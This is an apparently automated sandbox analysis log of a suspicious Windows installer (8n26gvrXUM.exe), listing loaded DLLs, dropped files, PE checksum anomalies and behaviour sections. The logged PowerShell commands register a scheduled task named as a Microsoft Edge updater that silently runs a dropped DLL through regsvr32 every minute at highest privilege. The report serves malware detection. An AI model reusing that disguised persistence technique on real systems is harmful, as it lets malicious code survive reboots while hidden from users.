      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpWindow found: window name: TMainFormJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: 8n26gvrXUM.exeStatic file information: File size 1479422 > 1048576
      Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 8n26gvrXUM.tmp, 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmp, 8n26gvrXUM.tmp, 00000001.00000003.884415031.0000000003370000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.00000000036C8000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.7.dr

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"Jump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348E7F00 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,9_2_00007FFD348E7F00
      Source: _isdecmp.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x5528
      Source: _isdecmp.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x5528
      Source: _setup64.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x8546
      Source: 8n26gvrXUM.exeStatic PE information: real checksum: 0x0 should be: 0x171e8d
      Source: is-JVPOA.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x131baa
      Source: is-J08NI.tmp.7.drStatic PE information: real checksum: 0x55cb should be: 0x1af86a
      Source: 8n26gvrXUM.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x122532
      Source: _setup64.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x8546
      Source: 8n26gvrXUM.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x122532
      Source: is-J08NI.tmp.7.drStatic PE information: section name: .xdata
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFCF436D2A5 pushad ; iretd 10_2_00007FFCF436D2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF435D2A5 pushad ; iretd 12_2_00007FFCF435D2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF447751C push ebx; iretd 12_2_00007FFCF447754A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF4470525 pushad ; retf 12_2_00007FFCF44705ED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF44705EE pushad ; retf 12_2_00007FFCF44705ED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF4542566 push 8B485F93h; iretd 12_2_00007FFCF454256B
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02F91E2C push ds; iretd 14_2_02F91E32
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02F91DCA push ds; iretd 14_2_02F91E32
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF449C194 push eax; ret 14_2_00007FFCF449C1AC
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF4493E15 push ebx; retn 000Dh14_2_00007FFCF4493E2A
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF46652C4 push esp; iretd 14_2_00007FFCF46655B9
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeFile created: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_shfoldr.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\is-JVPOA.tmpJump to dropped file
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeFile created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Roaming\is-J08NI.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_shfoldr.dllJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
